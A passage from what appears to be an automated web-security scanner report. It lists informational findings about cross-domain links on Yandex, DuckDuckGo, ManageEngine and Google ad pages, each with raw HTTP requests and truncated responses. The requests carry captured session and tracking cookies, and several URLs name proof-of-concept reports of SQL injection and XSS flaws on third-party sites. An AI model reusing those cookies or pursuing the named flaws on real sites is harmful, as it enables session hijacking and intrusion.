Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Host
Content-Length: 25502


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="nojs">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Em
...[SNIP]...
<link rel="SHORTCUT ICON" href="/favicon.ico"><script type="text/javascript" src="http://img.yandex.net/y5/1.5b-c/mega-y5.js"></script><link rel="shortcut icon" href="/favicon.ico"/><script type="text/javascript" charset="utf-8" src="//yandex.st/jquery/1.4.2/jquery.min.js"></script><script type="text/javascript" charset="utf-8" src="//yandex.st/lego/2.4-73/common/js/_common.js"></script>
...[SNIP]...
<noscript><img alt=" " style="position:absolute" src="//mc.yandex.ru/watch/34"></noscript>
...[SNIP]...
<noscript><img alt=" " style="position:absolute" src="//mc.yandex.ru/watch/191494"></noscript>
...[SNIP]...
<div class="b-head-logo__logo">
<a href="http://www.yandex.ru" class="b-head-logo__link"><img class="b-head-logo__img" border="0" alt="............" src="//yandex.st/lego/_/X31pO5JJJKEifJ7sfvuf3mGeD_8.png"/></a>
...[SNIP]...
<td class="b-head-tabs__item b-head-tabs__tab">
<a href="http://metrika.yandex.ru" class="b-head-tabs__link">..............</a>
...[SNIP]...
<td class="b-head-tabs__item b-head-tabs__tab">
<a href="http://partner.yandex.ru" class="b-head-tabs__link">.................. ........</a>
...[SNIP]...
<td class="b-head-tabs__item b-head-tabs__tab">
<a href="http://partner.market.yandex.ru/yandex.market/" class="b-head-tabs__link">............</a>
...[SNIP]...
<td class="b-head-tabs__item b-head-tabs__tab">
<a href="http://ba.yandex.ru" class="b-head-tabs__link">........</a>
...[SNIP]...
<td class="b-head-tabs__item b-head-tabs__tab">
<a href="http://money.yandex.ru" class="b-head-tabs__link">............</a>
...[SNIP]...
<li class="b-dropdown__item b-dropdown__visible">

<a class="b-dropdown__or" href="http://www.yandex.ru/all"><span class="b-pseudo-link">
...[SNIP]...
<li class="b-dropdown__item"><a href="http://api.yandex.ru">API</a>
...[SNIP]...
<li class="b-dropdown__item"><a href="http://webmaster.yandex.ru">..................</a>
...[SNIP]...
<li class="b-dropdown__item"><a href="http://widgets.yandex.ru">..............</a>
...[SNIP]...
<li class="b-dropdown__item"><a href="http://yaca.yandex.ru">..............</a>
...[SNIP]...
<li class="b-dropdown__item"><a href="http://narod.yandex.ru">..........</a>
...[SNIP]...
<li class="b-dropdown__item"><a href="http://site.yandex.ru">.......... ...... ..........</a>
...[SNIP]...
<li class="b-dropdown__item"><a href="http://pdd.yandex.ru">.......... ...... ............</a>
...[SNIP]...
<li class="b-dropdown__item b-dropdown__line"><a href="http://www.yandex.ru/all">...... ..............</a>
...[SNIP]...
<td class="b-hmenu__item item">
<a href="http://wordstat.yandex.ru/" onclick="try {yaCounter191494.reachGoal('MDNWORDNO'); } catch (e) {};OpenWindow('http://wordstat.yandex.ru/?direct=1', 870, 600, 'advq', 1); return false;">............ ........</a>
...[SNIP]...
<td class="b-head-userinfo__entry"><a href="http://passport.yandex.ru/passport?mode=auth&msg=direct&retpath=http%3A%2F%2Fdirect.yandex.ru%2Fregistered%2Fmain.pl" class="b-pseudo-link">..........</a>
...[SNIP]...
<div class="b-morda-main__pay">.... ..................:<a href="http://money.yandex.ru/"><img class="b-morda-main__pay__img" src="/block/b-morda-main/pay/b-morda-main__pay-yamoney.gif" alt="........................." title="........................."/>
...[SNIP]...
</div><a class="b-morda-main__details" href="http://advertising.yandex.ru/welcome/" onclick="">.................. .. ...........................</a>
...[SNIP]...
</strong>.................. .......... ............................ <a target="_blank" href="http://help.yandex.ru/direct/?id=1116045">.................. .................... ................</a>
...[SNIP]...
<li class="b-morda-info__item">............................ <a href="http://clck.yandex.ru/redir/dtype=stred/pid=36/cid=70390/*http://www.advertising.yandex.ru/welcome/pdf/direct_booklet.pdf" onclick="try {yaCounter191494.reachGoal('MDIRDOWNPDFOFF'); } catch (e) {};">................ ....&nbsp;..............</a>
...[SNIP]...
<li class="b-morda-info__item">.................. .................. ...................... .................. ................ <a href="http://advertising.yandex.ru/seminar/" target="_blank" onclick="try {yaCounter191494.reachGoal('MDNSEMINARALL'); } catch (e) {};">....&nbsp;........................ ..................</a>
...[SNIP]...
<li class="b-morda-info__item">.............. .... ............................ .............. ..&nbsp;.............. <a href="http://metrika.yandex.ru/" target="_blank" onclick="try {yaCounter191494.reachGoal('MDNMETRIKAALL'); } catch (e) {};">...........................</a>
...[SNIP]...
<li class="b-morda-info__item">.............. ...... ........ <a href="http://advertising.yandex.ru/" target="_blank" onclick="try {yaCounter191494.reachGoal('MDNADVERTALL'); } catch (e) {};">.................. ........................ ..............</a>
...[SNIP]...
<p>........ .. ...... ........ ........, .................. .. <a href="http://partner.yandex.ru/?hnt=dir" target="_blank" onclick="try {yaCounter191494.reachGoal('MDNEAMALL'); } catch (e) {};">.................. ........ ..............</a>
...[SNIP]...
<p>.................... .............. ..&nbsp;.............. .......... <a href="http://advertising.yandex.ru/contact/agency/" onclick="try {yaCounter191494.reachGoal('MDNAGENCYALL'); } catch (e) {};">.................. ..................</a>
...[SNIP]...
<noscript onclick="return {name: 'i-flashcookie'}"><img src="http://kiks.yandex.ru/fu/" alt="" /></noscript>
...[SNIP]...
</a>&nbsp;&middot;
<a href="http://direct.yandex.com">in English</a>
...[SNIP]...
</span> &laquo;<a href="http://www.yandex.ru/">............</a>
...[SNIP]...
</a>&nbsp;&middot; <a href="http://advertising.yandex.ru/">..............</a>
...[SNIP]...
23.10. http://duckduckgo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://duckduckgo.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?q=site%3Axss.cx HTTP/1.1
Host: duckduckgo.com
Proxy-Connection: keep-alive
Referer: http://duckduckgo.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 15:39:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Mon, 25 Apr 2011 15:39:08 GMT
Cache-Control: max-age=1
Content-Length: 8090

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta name="robots" content="noindex,nofollow"><meta http-equiv="content-type" content="text/html;
...[SNIP]...
<li><a href="http://donttrack.us/">DontTrack.us</a>
...[SNIP]...
<li><a href="http://duck.co/">Forum</a></li><li><a href="http://webchat.freenode.net/?channels=duckduckgo">Chatroom</a></li><li><a href="http://cafepress.com/duckduckgo">T-shirts</a>
...[SNIP]...
23.11. http://foreign.dt00.net/zones/zone25.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://foreign.dt00.net
Path:   /zones/zone25.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /zones/zone25.php?country=4&region=0 HTTP/1.1
Host: foreign.dt00.net
Proxy-Connection: keep-alive
Referer: http://foreign.dt00.net/foreign/doping.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:03 GMT
Content-Type: text/html
Connection: keep-alive
Keep-Alive: timeout=20
Content-Length: 644


document.write('<div style="height:90px;overflow:hidden;background:url(http://img.dt00.net/images/banners/ap-banner-bg.png) no-repeat;"><a href="http://usr.marketgid.com/demo/popunder/" target="_blank" style="display:block;margin:28px 0 0 40px;font:700 11px Tahoma,Verdana,Arial;color:#000;text-decoration:none;"><strong style="color:#d93329;">
...[SNIP]...
23.12. http://forums.manageengine.com/fbw  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.manageengine.com
Path:   /fbw

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /fbw?fbwId=49000004360353 HTTP/1.1
Host: forums.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); zdccn=067f90c3-40d8-4a59-bdeb-52669063c03a; JSESSIONID=9FFB2A137484D14862CCB036AE627428; __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 12:11:52 GMT
Server: Apache-Coyote/1.1
Content-Length: 25830


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

<link href="//css.zohostatic.com/discussions/v1/css/feedbackembed.css" type="text/css" rel="stylesheet"/>
<script src="//css.zohostatic.com/discussions/v1/js/zdjquery.min.js" type="text/javascript" ></script>
<script src="//css.zohostatic.com/discussions/v1/js/crossdomain.js" type="text/javascript" ></script>
...[SNIP]...
<div class="footer">
<a href="http://discussions.zoho.com/home"><div class="flRight powzd">
...[SNIP]...
23.13. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303788500&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Fblind-sql-injection-cwe89-capec66-database-error-mysql-ghdb-example-poc-report-secure.trust-guard.com_443.htm&dt=1303770516797&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303770516836&frm=0&adk=1819763764&ga_vid=1168140585.1303770517&ga_sid=1303770517&ga_hid=1147584645&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1192&bih=981&fu=0&ifi=1&dtd=55&xpc=5JjdzVa3BJ&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 22:28:27 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12531

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/blind-sql-injection-cwe89-capec66-database-error-mysql-ghdb-example-poc-report-secure.trust-guard.com_443.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.eEye.com/Free-Scanner/%26adT%3DFree%2BVulnerabilityScanner%26adU%3Dvulnerability.scan.qualys.com%26adT%3DSecurity%2BVulnerabilities%26adU%3Dwww.apcon.com%26adT%3DSoftware%2BEngineer%2BJobs%26gl%3DUS&amp;usg=AFQjCNF6bTUDnQSXErLZjT8YvFW41iy0aA" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.14. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303758835&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Fhourlydeploycom%2Fcoldfusion-user-agent-cross-site-scripting-xss-http-header-injection-overflow-vulnerability-example-poc-report.html&dt=1303740834875&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303740835053&frm=0&adk=1607234649&ga_vid=1571659581.1303740835&ga_sid=1303740835&ga_hid=2038561959&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&fu=0&ifi=1&dtd=237&xpc=SCB3C2OVZc&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:13:44 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12689

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/hourlydeploycom/coldfusion-user-agent-cross-site-scripting-xss-http-header-injection-overflow-vulnerability-example-poc-report.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.owlcti.com/energy%26adT%3DOwl%2BComputing%2BTech%26adU%3Dwww.ServerTech.com%26adT%3DServer%2BDowntime/Overload%253F%26adU%3Dwww.Deloitte.com/us%26adT%3DInsider%2BThreat%2BSecurity%26gl%3DUS&amp;usg=AFQjCNGaNBAPUAlHhfIQiJnQRGGgqTVeGg" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.15. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303757158&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-javascript-double-quote-example-poc-hoursdeploycom.html&dt=1303739157768&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303739158761&frm=0&adk=1607234649&ga_vid=1027902251.1303739159&ga_sid=1303739159&ga_hid=375496671&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=965&fu=0&ifi=1&dtd=1514&xpc=qT0wDNmjtE&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 13:45:48 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4371

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/reflected-xss-cross-site-scripting-javascript-double-quote-example-poc-hoursdeploycom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DBIRT-Exchange.com/JBoss%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNH0-cW4j459O3JY9HOo2mnyhUiHDA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
23.16. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303758255&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-cwe-79-capec-86-hourly.deploy.com_443.htm&dt=1303740255147&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303740255194&frm=0&adk=1819763764&ga_vid=1938262857.1303740256&ga_sid=1303740256&ga_hid=1224938138&ga_fc=0&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1109&bih=981&fu=0&ifi=1&dtd=784&xpc=ZGxB6Kj0D3&p=file%3A// HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 14:04:05 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 4340

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
<div id=abgb><img src='http://pagead2.googlesyndication.com/pagead/images/i.png' alt="(i)" border=0 height=12px width=12px/></div><div id=abgs><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dfile:///C:/cdn/2011/04/25/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-hourly.deploy.com_443.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.Credant.com/Healthcare%26adT%3DImageAd%26gl%3DUS&amp;usg=AFQjCNGN5LJ8qK09GbjbO3hx95bAsitUaA" target=_blank><img alt="Ads by Google" border=0 height=16px src=http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-ffffff.png width=78px/></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/graphics.js"></script><script src="http://pagead2.googlesyndication.com/pagead/js/abg.js"></script>
...[SNIP]...
23.17. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303751190&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Freflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.html&dt=1303733223690&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303733223727&frm=0&adk=1607234649&ga_vid=700321566.1303733224&ga_sid=1303733224&ga_hid=1638361633&ga_fc=0&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1018&bih=978&fu=0&ifi=1&dtd=125&xpc=KPpLNnOf5F&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 12:06:53 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12736

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/25/dork/reflected-xss-cross-site-scripting-cwe-79-capec-86-ghdb-stillsecurecom.html%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3DCymphonix.com/Application%252BSecurity%26adT%3DApplication%2BSecurity%26adU%3Dwww.Sentrigo.com%26adT%3DDatabase%2BSecurity%2BGuide%26adU%3DPRWeb.com%26adT%3DPress%2BRelease%2BTemplates%26gl%3DUS&amp;usg=AFQjCNFiTNCYKiwvS0BXGBykLX8TGZTh0g" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...
23.18. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303790964&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F25%2Fdork%2Fsql-injection-database-user-administrator-stored-cross-site-scripting-learnshavlikcom.htm&dt=1303772972759&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303772972990&frm=0&adk=1819763764&ga_vid=2020468090.1303772975&ga_sid=1303772975&ga_hid=1223485815&ga_fc=0&u_tz=-300&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1192&bih=965&fu=0&ifi=1&dtd=2130&xpc=y7T199Ct1d&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 25 Apr 2011 23:09:24 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12745

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
